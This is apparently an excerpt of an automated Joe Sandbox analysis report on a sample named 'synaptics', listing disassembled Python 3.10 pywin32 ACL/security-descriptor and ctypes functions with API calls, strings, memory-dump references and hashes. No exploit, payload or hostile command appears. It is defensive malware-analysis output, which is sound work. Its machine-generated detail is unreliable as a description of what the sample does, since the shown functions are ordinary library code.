                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46F33
                                                                                                                                                                                                              • SetSecurityDescriptorGroup.ADVAPI32(?,?,?), ref: 6BF46F42
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorGroup,00000000), ref: 6BF46F52
                                                                                                                                                                                                              • ?SetSD@PySECURITY_DESCRIPTOR@@QAEHPAX@Z.PYWINTYPES310(?), ref: 6BF46F74
                                                                                                                                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6BF46F9F
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46FB2
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46FC2
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF46FD4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Oi:SetSecurityDescriptorOwner, xrefs: 6BF46E7A
                                                                                                                                                                                                              • The object is not a PySID object, xrefs: 6BF46EB8
                                                                                                                                                                                                              • SetSecurityDescriptorGroup, xrefs: 6BF46F4D
                                                                                                                                                                                                              • SetSecurityDescriptorGroup - invalid sid, xrefs: 6BF46EE4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$DescriptorSecurity$Err_Error@@GroupU_object@@Win_$AbsoluteArg_FormatMakeOwnerParseStringTupleValidmalloc
                                                                                                                                                                                                              • String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorGroup$SetSecurityDescriptorGroup - invalid sid$The object is not a PySID object
                                                                                                                                                                                                              • API String ID: 2713208155-2851344522
                                                                                                                                                                                                              • Opcode ID: 5d9bfe9cba63b810f7cf2206b9034554e44cbb7f38dfda4194beb14127d60c4f
                                                                                                                                                                                                              • Instruction ID: 082a8da3ec5228de0522579f2bd1387d3890f93dbd0aeaac41ef40eb79b5ff3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d9bfe9cba63b810f7cf2206b9034554e44cbb7f38dfda4194beb14127d60c4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B41E473214301ABD700EF68DC40A6B7BECEF95654F4404A9F89592133EB39E6199BA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,O|n:from_buffer,?,6C0B6110), ref: 6C0A183B
                                                                                                                                                                                                              • PyMemoryView_FromObject.PYTHON310(?), ref: 6C0A184F
                                                                                                                                                                                                              • PyBuffer_IsContiguous.PYTHON310(0000001C,00000043), ref: 6C0A1875
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,underlying buffer is not C contiguous), ref: 6C0A188E
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,offset cannot be negative), ref: 6C0A18AC
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,Buffer size too small (%zd instead of at least %zd bytes),?,?), ref: 6C0A18D6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A18E5
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.cdata/buffer,nnn,0000001C,?,6C0B6110), ref: 6C0A1905
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A193D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class), ref: 6C0A1964
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • O|n:from_buffer, xrefs: 6C0A1833
                                                                                                                                                                                                              • ctypes.cdata/buffer, xrefs: 6C0A1900
                                                                                                                                                                                                              • underlying buffer is not C contiguous, xrefs: 6C0A1882
                                                                                                                                                                                                              • nnn, xrefs: 6C0A18FB
                                                                                                                                                                                                              • underlying buffer is not writable, xrefs: 6C0A186B
                                                                                                                                                                                                              • Buffer size too small (%zd instead of at least %zd bytes), xrefs: 6C0A18CF
                                                                                                                                                                                                              • abstract class, xrefs: 6C0A195D
                                                                                                                                                                                                              • offset cannot be negative, xrefs: 6C0A18A5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$String$Dealloc$Arg_AuditBuffer_ContiguousFormatFromMemoryObjectParseSizeSys_Tuple_View_
                                                                                                                                                                                                              • String ID: Buffer size too small (%zd instead of at least %zd bytes)$O|n:from_buffer$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$underlying buffer is not C contiguous$underlying buffer is not writable
                                                                                                                                                                                                              • API String ID: 2654105304-3790261066
                                                                                                                                                                                                              • Opcode ID: 07ccb4c5a411ea58e2dcf8f40cd0c0404881e4e120c53bef42f8d7f0384ef02e
                                                                                                                                                                                                              • Instruction ID: 6fe6c771ba467000e5f836be4cfc40b8244f5e153f526192a2a9574a9e272cd9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07ccb4c5a411ea58e2dcf8f40cd0c0404881e4e120c53bef42f8d7f0384ef02e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 904113B1704245EBCB04CBD8DE40B9A77F5EF4232DF104664E90DE6A42EB33D9168B95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • AddAuditAccessAceEx.ADVAPI32(?,?,?,?), ref: 6BF42EEF
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 6BF42EFD
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(AddAuditAccessAceEx,00000000,?,?,?,?), ref: 6BF42F10
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,?,?,?,?), ref: 6BF42F21
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9D44,%s: adding ACE would put ACL over size limit,PyACL::AddAuditAccessAceEx,?,?,?,?,?), ref: 6BF42F49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s: adding ACE would put ACL over size limit, xrefs: 6BF42F42
                                                                                                                                                                                                              • AddAuditAccessAceEx: unable to allocated %d bytes, xrefs: 6BF42F70
                                                                                                                                                                                                              • PyACL::AddAuditAccessAceEx, xrefs: 6BF42F3D
                                                                                                                                                                                                              • AddAuditAccessAceEx, xrefs: 6BF42F0B, 6BF42FF8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFormatLast$AccessAuditBuildDecodeErr_Error@@LengthMessageSizeU_object@@Unicode_Value_Win_
                                                                                                                                                                                                              • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAceEx$AddAuditAccessAceEx: unable to allocated %d bytes$PyACL::AddAuditAccessAceEx
                                                                                                                                                                                                              • API String ID: 3487046937-2822617188
                                                                                                                                                                                                              • Opcode ID: f15f472e8ecfab977b06f456b142dce1846440cddfb4b3544715b23e73bd33e0
                                                                                                                                                                                                              • Instruction ID: be880207fc6fd2c815e72d017ece82fa95f70620f9da5a28134ccde3bf5fe98c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f15f472e8ecfab977b06f456b142dce1846440cddfb4b3544715b23e73bd33e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D031C5336601106BDB017B68AC05A7ABF64FF96266F840479FD08D1133D72FC529A7B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,Attributes of PyDEVMODEW can't be deleted), ref: 6BF43CB4
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6BF43CE0
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EADFC,Getting WCHAR string), ref: 6BF43CFB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • FormName must be a string of length %d or less, xrefs: 6BF43D17
                                                                                                                                                                                                              • Attributes of PyDEVMODEW can't be deleted, xrefs: 6BF43CAD
                                                                                                                                                                                                              • , xrefs: 6BF43D09
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF43DAD
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF43D84
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF43DA2, 6BF43DA7
                                                                                                                                                                                                              • Getting WCHAR string, xrefs: 6BF43CF4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                              • String ID: $<NULL!!>$Attributes of PyDEVMODEW can't be deleted$FormName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.
                                                                                                                                                                                                              • API String ID: 3849944921-1437512493
                                                                                                                                                                                                              • Opcode ID: 5c2fc11ec23eba2ec91e227775e42e7b1f5db7624c4c9c9979667d81a88e0beb
                                                                                                                                                                                                              • Instruction ID: e7d3df2c9a7ca293953f44d79af3e94924ab4794ea2be63f07b644077ceddc61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c2fc11ec23eba2ec91e227775e42e7b1f5db7624c4c9c9979667d81a88e0beb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131B332520104AFDB05EB68DC48F263FA8EF56329F004694F518862B7D775EA28CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B5D90,?,00000000,?,6C0A85D3), ref: 6C0A7EE0
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B5C88,6C0A85D3), ref: 6C0A7EF2
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B56F8), ref: 6C0A7F04
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B6110), ref: 6C0A7F20
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B5360), ref: 6C0A7F3C
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B64C8), ref: 6C0A7F58
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B57F8), ref: 6C0A7F74
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B5238), ref: 6C0A7F90
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B59C0), ref: 6C0A7FAC
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B5048), ref: 6C0A7FC8
                                                                                                                                                                                                              • PyModule_AddType.PYTHON310(00000000,6C0B6828), ref: 6C0A7FF5
                                                                                                                                                                                                              • PyModule_AddType.PYTHON310(00000000,6C0B65E0), ref: 6C0A801C
                                                                                                                                                                                                              • PyModule_AddType.PYTHON310(00000000,6C0B5438), ref: 6C0A8043
                                                                                                                                                                                                              • PyModule_AddType.PYTHON310(00000000,6C0B5160), ref: 6C0A806A
                                                                                                                                                                                                              • PyModule_AddType.PYTHON310(00000000,6C0B66D8), ref: 6C0A8091
                                                                                                                                                                                                              • PyModule_AddType.PYTHON310(00000000,6C0B5620), ref: 6C0A80B4
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B6010), ref: 6C0A80C2
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B63E8), ref: 6C0A80DA
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B6308), ref: 6C0A80E8
                                                                                                                                                                                                              • PyType_Ready.PYTHON310(6C0B6230), ref: 6C0A8102
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ReadyType_$Module_Type
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2298540608-0
                                                                                                                                                                                                              • Opcode ID: 5e2c13d3dd8281a59ce05d6a5b851e1c006be8eb19344f879058519c80794910
                                                                                                                                                                                                              • Instruction ID: c126fac2239237c9f7d88078772ebf08380769c8d5620581ad8c8f8cb898c2d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e2c13d3dd8281a59ce05d6a5b851e1c006be8eb19344f879058519c80794910
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041C8B5B012455BEA04CBE9DD877877AFCAF02648B440A7ADE49F7A11FB33D0048B65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,not a ctype instance), ref: 6C0AB865
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,not a ctype instance), ref: 6C0AB89B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String
                                                                                                                                                                                                              • String ID: (%s) $can't delete attribute$expected %s instance, got %s$incompatible types, %s instance instead of %s instance$not a ctype instance
                                                                                                                                                                                                              • API String ID: 1450464846-2606598903
                                                                                                                                                                                                              • Opcode ID: 342a3261d7a8c8a1092b589b9eab6ad7f0a691741121257e8af4141d5d97b63a
                                                                                                                                                                                                              • Instruction ID: 1a2c5d5766a61d4bda494c77726bf738b7375c9539f21964432b7bb5e48b900d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 342a3261d7a8c8a1092b589b9eab6ad7f0a691741121257e8af4141d5d97b63a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F812C71B04209ABCB04CFE8DD80B59B7F9EF0132CB144655F829A7B51DB32E952C795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyThreadState_GetDict.PYTHON310(?,?,?,6C0A9C72), ref: 6C0A9378
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9A14,cannot get thread state,?,6C0A9C72), ref: 6C0A9390
                                                                                                                                                                                                              • PyUnicode_InternFromString.PYTHON310(ctypes.error_object,00000000,?,?,6C0A9C72), ref: 6C0A93B0
                                                                                                                                                                                                              • PyDict_GetItemWithError.PYTHON310(00000000,00000000,00000000,?,?,6C0A9C72), ref: 6C0A93C8
                                                                                                                                                                                                              • PyCapsule_IsValid.PYTHON310(00000000,_ctypes pymem), ref: 6C0A93DD
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9A14,ctypes.error_object is an invalid capsule), ref: 6C0A93F6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Err_$Capsule_DictDict_ErrorFromInternItemState_ThreadUnicode_ValidWith
                                                                                                                                                                                                              • String ID: _ctypes pymem$cannot get thread state$ctypes.error_object$ctypes.error_object is an invalid capsule
                                                                                                                                                                                                              • API String ID: 107083413-3474121714
                                                                                                                                                                                                              • Opcode ID: 3928a44706a865d8dbced68fc3f37692df349123480327fec4c9437e626f5804
                                                                                                                                                                                                              • Instruction ID: 39cbee73466aa8aec4eb6a08cf09dabe3f5067e14934f5af249f7f435c4d2e43
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3928a44706a865d8dbced68fc3f37692df349123480327fec4c9437e626f5804
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4131E8B17081115FCB00DBE9AD49A9A77F8EF0766EB140675FE0DD1701EF23881586A9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,Attributes of PyDEVMODEW can't be deleted), ref: 6BF43B14
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6BF43B40
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EADFC,Getting WCHAR string), ref: 6BF43B5B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Attributes of PyDEVMODEW can't be deleted, xrefs: 6BF43B0D
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF43C0E
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF43BE5
                                                                                                                                                                                                              • DeviceName must be a string of length %d or less, xrefs: 6BF43B7A
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF43C03, 6BF43C08
                                                                                                                                                                                                              • Getting WCHAR string, xrefs: 6BF43B54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                              • String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$DeviceName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.
                                                                                                                                                                                                              • API String ID: 3849944921-4086025595
                                                                                                                                                                                                              • Opcode ID: 163bb324f25e28029a0fbd241dbaa555d728211e012b322b52abaa5a743cc650
                                                                                                                                                                                                              • Instruction ID: 9d1ee056e76262404a99f391bedf9887d6609b6131375e26f22872bac94e67ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 163bb324f25e28029a0fbd241dbaa555d728211e012b322b52abaa5a743cc650
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31D833521100AFDB05EB68CC88F6A3FA4EF16325F004654F525861B7D77AE938CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyMapping_Check.PYTHON310(00000000,00000000,6BF436BE), ref: 6BF41BF6
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Object must be a mapping (dictionary, class instance, etc), ref: 6BF41C0F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Object must be a mapping (dictionary, class instance, etc, xrefs: 6BF41C08
                                                                                                                                                                                                              • P)Pl, xrefs: 6BF41C1E
                                                                                                                                                                                                              • __dict__, xrefs: 6BF41CB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckErr_Mapping_String
                                                                                                                                                                                                              • String ID: Object must be a mapping (dictionary, class instance, etc$P)Pl$__dict__
                                                                                                                                                                                                              • API String ID: 1486305882-395520567
                                                                                                                                                                                                              • Opcode ID: 2d74d68d19d8e6ecb2c095f4be70be9fd22100653878d1898b4659e715abf4a8
                                                                                                                                                                                                              • Instruction ID: 04a6eaf61d8a34adf0df48b3148553c58e2f2b1ba95066d3708dbfd8cb49be2b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d74d68d19d8e6ecb2c095f4be70be9fd22100653878d1898b4659e715abf4a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92212B719301215BD7047B28AC48BBB3F68EF56326B000264FD06C123BE729D639965A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • int too long to convert, xrefs: 6C0A9AAF
                                                                                                                                                                                                              • _ctypes pymem, xrefs: 6C0A9B16
                                                                                                                                                                                                              • Don't know how to convert parameter %d, xrefs: 6C0A9B8E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Don't know how to convert parameter %d$_ctypes pymem$int too long to convert
                                                                                                                                                                                                              • API String ID: 0-4137960972
                                                                                                                                                                                                              • Opcode ID: aa3e492ad6477e70bd96c76f4fd94a7852d1a53e42d98f7b359046e0709496e5
                                                                                                                                                                                                              • Instruction ID: 42188bbb3d1f345fce8aed83fd373f58bdcef9b571ac4473aa22734ba5409a3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa3e492ad6477e70bd96c76f4fd94a7852d1a53e42d98f7b359046e0709496e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D5112B17042018FDB00DFA9E980B96B7F8EF41329B108A3AE56DC7A51DB33E455CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF41A45
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EADFC,Error reordering ACL: Unable to allocate acl of size %d,?,00000000,?,?,?,?,?,?,?,6BF42542), ref: 6BF41A61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error reordering ACL: Unable to allocate acl of size %d, xrefs: 6BF41A5A
                                                                                                                                                                                                              • AddAccesAllowedAce, xrefs: 6BF41A09
                                                                                                                                                                                                              • Ace type %d is not supported yet, xrefs: 6BF41B6C
                                                                                                                                                                                                              • ReorderACL, xrefs: 6BF41B94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
